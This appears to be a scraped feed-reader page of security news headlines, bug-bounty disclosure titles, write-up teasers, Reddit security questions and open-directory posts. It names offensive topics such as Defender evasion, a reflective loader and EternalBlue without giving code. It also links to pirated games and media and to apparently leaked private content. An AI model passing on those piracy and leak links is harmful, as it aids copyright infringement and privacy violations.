    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000

  • Open

    ZAP의 새로운 Import/Export Addon, 그리고 미래에 대한 뇌피셜
    최근에 ZAP 내 여러가지 Import, Save 관련 기능들이 “Import/Export"란 이름의 새로운 Addon으로 통합되었습니다. 사용자 Interface 상에선 변화가 없어서 크게 달라진 건 없지만 이를 통해 앞으로의 ZAP에서 Import/Export 기능에 대한 방향성을 엿볼 수 있어서 글로 작성해봅니다 😎 Import files containing URLs Log File Importer Save Raw Message Save XML Message 새로 추가된 Import/Export의 실제 Addon 이름은 exim입니다. EXIM은 EXport & IMport의 약자로 웹에서도 동일한 의미로 많이 쓰이는 말입니다. ZAP의 Addon은 API를 제공하도록 어느정도 강제하고 있는 사항이라 exim도 API로 제공되고 있습니다.
    Web Cache 취약점들을 스캐닝하자 🔭
    Web Cache Poisoning, Web Cache Deception 등 Web Cache 관련 취약점은 나름 오래된 기법이지만 요 몇 년 사이 알비노왁스(@albinowax) 등 Portswigger의 연구원들에 의해 빠르게 발전한 것 같습니다. 이러한 취약점들은 여러가지 테스팅 방법을 통해서 식별하고 Exploit 하지만 이전까진 크게 강력하다고 생각하던 도구가 없었던 상태입니다. (그나마 burpsuite의 내장 스캐너가 있겠네요…) 오늘은 Web Cache 취약점을 빠르게 식별할 수 있는 좋은 도구가 있어서 공유할까합니다! 사실 제가 관련 도구를 올 여름(21년 6월쯤?) 정도부터 아주 천천히 만들고 있었는데, Hackmanit에서 선수를 처버렸네요.
  • Open

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XPSF VLC Playlist of movies I found here
    Please delete if not allowed Hi guys, awhile ago I made a quick and easy browser tool to convert links into a VLC Playlist, you might be wondering why I opted out of M3U playlists, honestly for future expansion, m3u playlists tend to be pretty simple on the SPEC, can't define much, while XPSF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3mins, while the 4.1k only takes 10secs. Please test carefully with the 14.1k, some PC's might fail to load it, vlc could crash b4 finish loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho. Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )
  • Open

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )
  • Open

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021–40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering very important for pentester. Continue reading on Medium »  ( 2 min )
  • Open

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and, asked myself what I want to do with it. I often found myself at one filed, Security. However I have no clue on how or where to start learning more about the field. For example I find pentesting especially interesting and searched for ways to get into the field. I found two ideolegies for that, one being hands on experience and the other being strong basics. However that only gave me more questions. First: what is "Hands-on experience" ? Do I have to hack my own laptop or crack my neighbors Wifi password? Or is it much simpler to get experience? Second: Basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics ? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint开源 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint开源 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]
  • Open

    FreeBuf早报 | 部分App禁止全部权限仍可获取用户信息;《蜘蛛侠》盗版资源内含恶意程序
    《蜘蛛侠:英雄无归》的一些盗版资源包含挂马或者捆绑恶意软件,甚至还有夹杂挖矿程序。  ( 1 min )
  • Open

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »
  • Open

    What is a Watering Hole Attacks and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    Weaponize JScript to bypass Windows Defender
    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )
  • Open

    Accessing data in suspect disk
    After copying with write block how to investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers? or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )

  • Open

    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TtyHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with methodology step-by-step: information gathering scanning search for vulnerabilities and so on.. I would like to put "cheatsheet" for useful commands like nmap, dirbuster, sqlmap .. I tried a simple blog with Wordpress, but I wondering if you use something better (github)? Thankyou. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, i'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is for a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400(2 cores, 4 threads) and 4GB RAM good enough? i read somewhere that CPU(# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a sife?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )
  • Open

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for english or farsi, according to the few I checked; *slow, though)
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    从了解洞态IAST到加入开源社区
    作为公司信息安全部的成员,确保每一条业务线的应用安全,是我工作的一部份,那么如何完全这项使命呢?  ( 1 min )
    从0到1编写一个Xposed Module :Anti Screenshot
    菜鸡的截图之路  ( 1 min )
    Abaddon:专为红队研究人员设计的增强工具
    Abaddon旨在帮助红队研究人员提升运营效率,并通过更高的速度和更隐蔽的方式执行某些重复操作。  ( 1 min )
  • Open

    HOW I Found 17 Critical and Medium Security Bug on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access Maxlifeinsurance insurance company AWS metadata access by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine.my name is khan mamun(white hat hacker) This is my 3rd write up. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )
  • Open

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your Pc Notify Your Phone Whenever There is Movement Around it
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )
  • Open

    Forensic Courses
    Took the video lectures from EC Council CHFI. But it did not teach me how to use tools or real world data just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the word doc's property? submitted by /u/HelloAmes [link] [comments]  ( 2 min )
  • Open

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it’s better than before, so I recommend an update! Then let’s start the review. and Have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, Thank you so much all contributors !! Thanks to our, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.

  • Open

    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    identifies SSL/TLS depencies
    Hello, It may look like a noob question but, It's my first job and... We have servers on which weak SSL/TLS versions are running. So,I have spoken with servers owners, check on which port their usage has been detecte, At the end of the investigation, I had determined that it was ok if I disabled TLS 1.0 and 1.1. But this was a mistake and one of our importante application couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch this issues. So was the best way to detect the usage of SSL/TLS. Should I sniff every servers with wireshark or something else? Thanks you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get shell into a exploit of SMB but I think it uses somewhat of buffer overflows scheme. Any way to see the exploit [code] behind metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )
  • Open

    Thread in lunar clinet?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with bitdefender and I detected this thread: java.trojan.genericgba.30921 but I looked for this name on the internet but nothing came out, the strange thing is that the thread was detected in a Lunar Client folder (A minecraft client) and also in a minecraft mod (Geyser) this seems very strange to me because according to the lunar client and geyser mod it is safe, does someone here have an answer to why it is detected as a thread? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things lead me to become interested in computer forensincs these past months, and I'm interested on following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one that wasn't answered: what are the fields you can work? I know you can work in law enforcement and do forensics analysis to find digital evidence of a suspect (wich is most cases I belive), but can you work on the investigation field (like tracing criminals online)? If not, how do I work on this investigation field related to crimes online? Is computer forensics the best thing to study in this case? Another question is: on the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    hi, is there a way in excel or other software to put a list of phonecalls, their dates and time and get a timeline that show how many calls were made to the same phone or to the same phone by date and time. Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    📷 There may be weeks before digital forensic people come to examine the Android 10 phone with unknown passcode. It was in use when seized, but later auto locked. Pls Help: (1) Should keep it in power on and keep charging it? since battery cannot last long enough for weeks. (2) Would it be harder to unlock or retrieve data if let it power down and then switch on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )
  • Open

    Joni MItchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi i use this website for repacks ddl http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir ​ archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    THe movie one Index of / The Music one Index of /Directos/ (ladiscoteca.net) If you go to parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you stroll down, Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small slection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite marvel superheroes or as a matter anyone’s else online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )
  • Open

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )
  • Open

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report`
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )
  • Open

    SecWiki News 2021-12-24 Review
    利用CodeQL分析并挖掘Log4j漏洞 by ourren vulntarget漏洞靶场系列(二)— vulntarget-b by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2021-12-24 Review
    利用CodeQL分析并挖掘Log4j漏洞 by ourren vulntarget漏洞靶场系列(二)— vulntarget-b by ourren 更多最新文章,请访问SecWiki
  • Open

    Full Path Disclosure in Wordpress Rest API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921
  • Open

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )
  • Open

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

    Links Digest 2021
    What I am currently reading The following is a list of books that I am currently reading. I like to read several books simultaneously to have more options in case I am not ready to absorb specific content. Sapiens: A Brief History of Humankind by Yuval Noah Harari A Brief History of Time by Stephen Hawking How to avoid a climate disaster by Bill Gates The Ride of a Lifetime: Lessons in Creative Leadership from 15 Years as CEO of the Walt Disney by Robert Iger The Double Helix by James Watson Tao Te Ching by Lao Tzu Notes from the Underground by Fyodor Dostoyevsky What I've read The following is a list of books that I've read and recommend to others to read or browse through. This list is not complete and sorted in no particular order. Some books are better than others. One day I will provi…
    Links Digest 2021
    A short list of useful links. Security Blogs https://0x00sec.org/ - don't know yet but it looks interesting https://abiondo.me - ctf and other hacking things from a talanted hacker https://www.vulnano.com/ - small blog but cool nevertheless https://bugbountyforum.com/ - interesting info about bug bounties https://xz.aliyun.com/ - interesting blog full of exploits and stuff https://sites.google.com/securifyinc.com/secblogs/table-of-contents - very cool research https://spaceraccoon.dev/ - bug bounty stuff https://samcurry.net - bug bounty stuff Zines https://www.alchemistowl.org/pocorgtfo/ - pocorgtfo https://secret.club - a zine but pretty compact and down to the point https://pagedout.institute/ - not sure yet Reference https://github.com/ngalongc/bug-bounty-reference https://cxsecurity.c…
  • Open

    2022年及以后的五项网络安全预测
    目前,网络安全业内领导者面临了众多挑战,并且未来几年依旧会持续增多。  ( 1 min )
    CVE-2021-31956 漏洞分析
    总体来说难度不大,非常适合初学者入门。  ( 1 min )
    FreeBuf甲方群讨论 | 企业安全的价值到底该如何度量?
    有人比喻到,安全就是桥两边的护栏,不出事谁也感受不到它的价值,没有又觉得不踏实。
    IoT SAFE ——强化物联网生态系统的安全性
    隧道的尽头是光。  ( 1 min )
    明年见 | CIS 2021春日版议题预告直播圆满成功
    这个圣诞,我不愿让你一个人因为有FreeBuf公开课陪伴着你~12月21日-12月23日每晚19点,FreeBuf公开课邀请大会各论坛嘉宾直播提前剧透议题,携手13位技术专家在直播间内与大家共话网络安全新技术、新趋势。足不出户,提前掌握各分论坛的干货内容,与行业大咖近距离交流,这个圣诞不再让你孤单~在这3天的直播里,来自各行各业的嘉宾给最为广泛的网络安全一线工作者中的代表者和佼佼者们带来了丰富的内  ( 1 min )
    windows ALPC内核拦截的方法
    ALPC这个只是一个标准协议,每个不同的服务比如 创建服务与创建账号与搜索系统信息等的具体内容都是不同的,要自己手动解码。  ( 2 min )
    什么是CDN?CDN的工作原理是怎样的?
    CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器。
    基于漏洞优先级,构建关基漏洞主动管理体系 | 世界信息安全大会
    浅谈关基建漏洞主动防御体系建设。  ( 1 min )
    《工业和信息化领域数据安全风险信息报送与共享工作指引(试行)(征求意见稿)》发布
    《工作指引》指出,风险信息报送,是指有关单位向工业和信息化部、地方工业和信息化主管部门、地方通信管理局报送数据安全风险信息的行为。
    Web渗透测试中我们该收集什么信息?
    知己知彼,百战不殆。一文看懂如何在渗透测试前期最大化收集信息。  ( 1 min )
    因为诈骗太多,“俄罗斯微信”VK强制上线双因素认证
    VK终于开始引入双因素身份认证,并计划在 2022 年 2 月强制要求大型社区的管理员使用。  ( 1 min )
    研究显示,圣诞期间的的撞库攻击将激增
    研究分析称,去年圣诞节和新年购物期间的撞库事件增加了 56%,预计 2021 年同期每天将有多达 800 万次针对消费者的攻击。  ( 1 min )
    逆向分析教程(二)——大本营
    逆向分析教程(一)——调试代码 新增调试命令我想大家根据上文实操已经掌握了提到的基本指令,我们再来复习下,F7,F8,ctrl+F2,ctrl+F9,如果感觉陌生建议回炉重造。因为今天我们又要开始了解  ( 1 min )
    FreeBuf周报 | Gumtree 分类网站泄露客户信息;Hive 勒索软件正大肆发起网络攻击
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    大型流量数据计算分析平台的构建与行业实践 | CIS 2021·Spring春日版大会议题初探
    基于流量的大型数据分析平台建设,能为企业提供更加动态、精准的营销建议,并从安全上为数据保驾护航。  ( 1 min )
    英伟达(NVIDIA)披露了受 Log4j 漏洞影响的应用程序
    Log4Shell漏洞,正在全球范围内被大量攻击利用。  ( 1 min )
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )

  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of pdf:es in all kind of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's a never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following: Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03 Initiating ARP Ping Scan at 18:37 Scanning 192.168.1.11 [1 port] Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:37 Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed Initiating SYN Stealth Scan at 18:37 Scanning 192.168.1.11 [1000 ports] Discovered open port 8080/tcp on 192.168.1.11 Discovered open port 9001/tcp on 192.168.1.11 Discovered open port 9080/tcp on 192.168.1.11 Discovered open port 8002/tcp on 192.168.1.11 Discovered open port 8001/tcp on 192.168.1.11 Discovered open port 9000/tcp on 192.168.1.11 Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports) Nmap scan report for 192.168.1.11 Host is up, received arp-response (0.0058s latency). Scanned at 2021-12-23 18:37:29 -03 for 0s Not shown: 994 closed ports Reason: 994 resets PORT STATE SERVICE REASON 8001/tcp open vcom-tunnel syn-ack ttl 64 8002/tcp open teradataordbms syn-ack ttl 64 8080/tcp open http-proxy syn-ack ttl 64 9000/tcp open cslistener syn-ack ttl 64 9001/tcp open tor-orport syn-ack ttl 64 9080/tcp open glrpc syn-ack ttl 64 MAC Address: 8C:EA:48:XX:XX:XX (Unknown) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB) It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
